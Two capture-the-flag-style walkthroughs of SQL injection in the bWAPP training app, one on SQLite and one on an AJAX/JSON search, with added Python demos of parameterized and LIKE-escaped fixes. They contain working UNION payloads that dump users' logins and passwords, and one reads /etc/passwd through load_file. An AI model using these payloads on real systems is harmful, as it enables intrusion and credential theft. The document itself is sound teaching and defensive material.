bWAPP SQL Injection (SQLite)

Introduction

Hi again. Today I have decided to document yet another unpublished challenge presented in bWAPP. This challenge concerns SQL injection where the server uses the SQLite engine.

I will try to make this post relatively short, explaining the following:

  • Getting To Know Our Target
  • Finding Database Information (tables/columns/sqlite version)
  • Extracting Database Information
  • Last Words

Getting To Know Our Target

In this section I want to spend some time on finding the SQL injection vulnerability and on the preparatory work needed to reach a working injection.

This challenge has a layout very similar to the previous bWAPP challenge I posted; it allows users to search for movie titles. The vulnerability itself is not difficult to find. Placing an apostrophe in the search string induces an error:

[Image: sqlite_error]

The page reveals only a vague "Error: HY000" message. I spent a few moments searching on Google for relevant results, but the information I came across was not very useful. I am fairly confident in exploiting SQLi vulnerabilities, so I approached this challenge as I normally would.

The first step I took was to find out how many columns existed in the table used by my query. The only problem was that the error message was not informative at all: any syntax error or incorrect information I sent produced the same error. Using ORDER BY helped me get one step closer to the solution.

iron' order by 300--   <-- Error: HY000
iron' order by 1--     <-- No error

I knew this was the path to exploitation and that my thoughts were on the right track. A few iterations later, I discovered that there were 6 columns.

[Image: sqlite_columns]

This was the preparation I needed before I could proceed to discover more about the database, which brings us to the next topic.

Finding Database Information (tables/columns/sqlite version)

Before I started to inject this web page, I knew what kind of information I was looking for. The issue was that I was not familiar with SQLite syntax. After looking at some SQLite documentation, I gathered enough information to know how to concatenate strings, find the SQLite version, and obtain the tables and columns.

The following injections demonstrate the aforementioned concepts, thus completing the challenge.

Finding SQLite version:

'union+select+1,2,sqlite_version(),4,5,6--+-

[Image: sqlite_version]

Finding database tables:

'union+select+1,2,name,4,5,6 from sqlite_master--+-

[Image: sqlite_name]

This next injection retrieves the DDL statements used to create the database's tables, which effectively reveals the tables and their columns. The injection follows:

'union+select+1,2,sql,4,5,6 from sqlite_master--+-

[Image: sqlite_sql]

The above image depicts the information needed: the login and password columns of the users table.

Extracting the login and password from the users table:

'union+select+1,2,login||":"||password,4,5,6 from users--+-

[Image: sqlite_data_extraction]

SQLite uses "||" as the operator to concatenate strings. In this case, we are joining the login and password with a colon.
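To make the two mechanisms above concrete from the defender's side, here is an added example (not bWAPP's code, and not the author's) that rebuilds the search on an in-memory SQLite database. It assumes a constructed six-column movies table and a users table so that the page's six-value UNION payload lines up. The vulnerable function splices the search term into the SQL text exactly as the challenge does; the safe one binds it as a parameter. With the same input, the first leaks sqlite_master and raises the ORDER BY error that served as the oracle, while the second simply searches for a title nobody has.

```python
import sqlite3

# Constructed demo schema (not bWAPP's real schema): six movie columns so the
# page's six-value UNION payload fits, plus a users table with sample rows.
SCHEMA = """
CREATE TABLE movies (id INTEGER, title TEXT, release_year INTEGER,
                     genre TEXT, main_character TEXT, imdb TEXT);
CREATE TABLE users (id INTEGER, login TEXT, password TEXT);
INSERT INTO movies VALUES (1, 'Iron Man', 2008, 'action', 'Tony Stark', 'tt0371746');
INSERT INTO movies VALUES (2, 'The Terminator', 1984, 'sci-fi', 'T-800', 'tt0088247');
INSERT INTO users VALUES (1, 'alice', 'constructed-hash-1');
"""


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def search_vulnerable(conn, term):
    # Mirrors the bWAPP pattern: user input spliced straight into the SQL text,
    # so a quote in `term` ends the literal and the rest is parsed as SQL.
    sql = f"SELECT * FROM movies WHERE title LIKE '%{term}%'"
    return conn.execute(sql).fetchall()


def search_safe(conn, term):
    # Bound parameter: SQLite receives the term as data, never as SQL, so
    # quotes, comments and UNIONs inside it have no syntactic effect.
    sql = "SELECT * FROM movies WHERE title LIKE ?"
    return conn.execute(sql, ("%" + term + "%",)).fetchall()


# The page's schema-disclosure payload (SQLite keeps the schema in sqlite_master).
SCHEMA_PAYLOAD = "' union select 1,2,name,4,5,6 from sqlite_master--"


def demo_schema_leak():
    # Returns (third column of every row the vulnerable search produced,
    #          rows from the safe search). Injected rows carry table names in
    # the third column, riding in the slot that normally holds release_year.
    conn = make_db()
    leaked = [row[2] for row in search_vulnerable(conn, SCHEMA_PAYLOAD)]
    safe = search_safe(conn, SCHEMA_PAYLOAD)
    return leaked, safe


def demo_error_oracle():
    # The ORDER BY probe from the walkthrough: out-of-range column numbers
    # raise an error only when the input reaches the parser.
    conn = make_db()
    probe = "' order by 300--"
    try:
        search_vulnerable(conn, probe)
        vuln_raised = False
    except sqlite3.OperationalError:
        vuln_raised = True
    return vuln_raised, search_safe(conn, probe)


if __name__ == "__main__":
    print(demo_schema_leak())
    print(demo_error_oracle())
```

The release_year column is declared INTEGER, yet the injected text values pass through unchanged; SQLite's column affinity does not stop a UNION from smuggling strings into a numeric slot, which is why the leaked names show up intact.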

Last Words

This concludes this thread. As always, I really hope that you can take something from this reading. Although SQLite is not as popular as other RDBMSs, information disclosure can still be achieved via SQL injection.

Happy hacking!


bWAPP SQL Injection (AJAX/JSON/jQuery) Challenge

Introduction

In this post I will be presenting the solution to the SQL Injection (AJAX/JSON/jQuery) challenge found on the vulnerable bWAPP virtual machine. I have decided to post the solution because I could not find one available online.

This write-up demonstrates how to exploit SQL injection flaws that sit behind web technologies such as AJAX, JSON, and jQuery. I will be using Burp Suite to intercept the requests sent from my web browser and modify them to test for vulnerabilities.

Tools being used:

Tool         Download
bWAPP        http://www.itsecgames.com/
Burp Suite   https://portswigger.net/burp/download.html

Getting To Know Your Target

This challenge starts off with a search feature that can pose a potential threat to the web application. As users type in the search bar, movies populate a table according to what is being searched. This challenge is distinct from other SQLi challenges because the use of AJAX and JSON provides a real-time feed of the information being requested. The images below capture this concept.

[Screenshots from 2016-05-05 17:00:53 and 17:01:01: results populating as the search term is typed]

Tampering with the URL to generate an SQL syntax error will not be possible with this challenge.

[Image: nosqlierror]

That being said, it is a good idea to intercept the client's request and the server's response to get a better picture of how this application works. Let's see what happens when an apostrophe is inserted into the request.

[Screenshot from 2016-05-05 17:05:05: SQL syntax error in the intercepted response]

An SQL syntax error is now apparent, a good indication of an SQLi flaw. Now that we have found our injection point, the next step is to formulate a working injection that can talk to the database. When I first attempted this challenge, I tried many injections to no avail. It was obvious to me that I needed a better understanding of what the SQL code in the background was doing, which brings us to the next topic.

Analysing SQL Code For Flaws

Fortunately, we are given access to the bWAPP virtual machine. I soon found that the SQL code handling my requests was the following:

$sql = "SELECT * FROM movies WHERE title LIKE '%" . sqli($title) . "%'";

[Screenshot from 2016-05-05 17:07:12: the query in the bWAPP source]

I never thought that I would be tampering with the SQL LIKE operator. I quickly simplified this code and wrote it down to start developing a working syntax to exploit the application:

$sql = "SELECT * FROM movies WHERE title LIKE '%iron%'";

Essentially, the above is the query that was being interpreted.

Finding a Working Injection Point

Now that I understood the query being used, it was time to start testing some of my suspicions.

The search feature offered by this challenge lets users search for any movie title as it automatically populates the results. For example, you can search for Iron Man or Terminator, but the results can never contain both, unless we inject an extra LIKE condition.

In theory, we can get both movies to show up with the following injection:

iron%' or title like '%term

This will make the back-end SQL code look like this:

$sql = "SELECT * FROM movies WHERE title LIKE '%iron%' or title like '%term%'";

[Screenshot from 2016-05-05 17:08:21: both movies returned]

As anticipated, the search results contained both movies.
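The LIKE break-out above is worth seeing side by side with its fix, so here is an added example (not the author's and not bWAPP's code) that reproduces the behaviour on a constructed one-column SQLite table. Two things are shown: the page's payload turns one LIKE condition into two when the term is spliced into the query text, and a bound parameter stops that; but binding alone still lets a user-typed % or _ act as a wildcard, so the safe version also escapes those characters with an ESCAPE clause. The helper names (like_search_concat, like_search_bound, escape_like) are this example's own.

```python
import sqlite3


def make_movies():
    # Constructed table standing in for bWAPP's movies table; one title per row.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE movies (title TEXT)")
    conn.executemany("INSERT INTO movies VALUES (?)",
                     [("Iron Man",), ("The Terminator",), ("100% Wolf",)])
    return conn


def like_search_concat(conn, term):
    # The pattern from the bWAPP handler: the term is spliced into the LIKE
    # literal, so a quote in the term ends the pattern early.
    sql = f"SELECT title FROM movies WHERE title LIKE '%{term}%'"
    return [row[0] for row in conn.execute(sql)]


def escape_like(term, esc="\\"):
    # Neutralise LIKE metacharacters so a user-typed % or _ matches literally.
    # The escape character itself is doubled first so it cannot be smuggled.
    return (term.replace(esc, esc + esc)
                .replace("%", esc + "%")
                .replace("_", esc + "_"))


def like_search_bound(conn, term):
    # Bound parameter plus ESCAPE: the term can neither leave the literal nor
    # inject a wildcard. Only the application adds the surrounding % signs.
    sql = "SELECT title FROM movies WHERE title LIKE ? ESCAPE '\\'"
    pattern = "%" + escape_like(term) + "%"
    return [row[0] for row in conn.execute(sql, (pattern,))]


# The page's payload: closes the first pattern and opens a second LIKE.
PAYLOAD = "iron%' or title like '%term"


def demo():
    conn = make_movies()
    return {
        # concatenated query: both movies come back, as in the walkthrough
        "concat_payload": like_search_concat(conn, PAYLOAD),
        # bound query: the whole payload is searched for as a literal title
        "bound_payload": like_search_bound(conn, PAYLOAD),
        # a bare % from the user matches every row when not escaped
        "concat_wildcard": like_search_concat(conn, "%"),
        # with escaping it only matches titles that really contain a %
        "bound_wildcard": like_search_bound(conn, "%"),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name}: {rows}")
```

The wildcard case is the part binding alone does not cover: a search box wired to LIKE with unescaped input lets any user dump the whole table with a single %, which is a data-exposure issue even when no injection is possible. SQLite's LIKE is case-insensitive for ASCII, which is why "iron" matches "Iron Man" here just as it does in the challenge.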

Extracting Database Information

Now that I had a working injection, I had to figure out how many columns exist in the movies table. This missing piece of the puzzle was found by looking at the server's response:

[{"0":"2","id":"2","1":"Iron Man","title":"Iron Man","2":"2008","release_year":"2008","3":"action","genre":"action","4":"Tony Stark","main_character":"Tony Stark","5":"tt0371746","imdb":"tt0371746","6":"53","tickets_stock":"53"}]

You can see from the data that there are 7 columns. This was my opportunity to start extracting some information from the database and files from the server. This injection was very tricky because it only works as I will shortly demonstrate. Some of the injections I could only get to work by commenting out the code at the end, and others would work without commenting it out. This is strange to me because the last statement in the request was needed to complete a true statement. I'm not an SQL expert, so I can live with this mystery.

Finding the database version with version():

iron%'+union+select+1,version(),3,4,5,6,7+and'%'='

[Screenshot from 2016-05-05 17:10:03: version() returned in the results]

The tables can be found with the following injection:

iron%'+union+select+1,group_concat(table_name),3,4,5,6,7+from+information_schema.tables+where+table_schema=database()--+and'%'='

The columns for the users table can be extracted with the following injection:

iron%'+union+select+1,group_concat(column_name),3,4,5,6,7+from+information_schema.columns+where+table_name='users'--+and'%'='

Extracting the login and password from the database along with the /etc/passwd file:

iron%'+union+select+1,group_concat(login,0x3a,password),load_file('/etc/passwd'),4,5,6,7+from+users--+and'%'='

[Screenshot from 2016-05-05 17:56:25: credentials and /etc/passwd in the results]

Last Words

The key to completing this challenge lies in figuring out a way to inject into the LIKE condition. Finding the vulnerability was not difficult, but most of my time was spent discovering a working injection.

Hopefully you have learned something from this short read. If you have any suggestions on what topics to cover or discuss next, please let me know.

Happy hacking!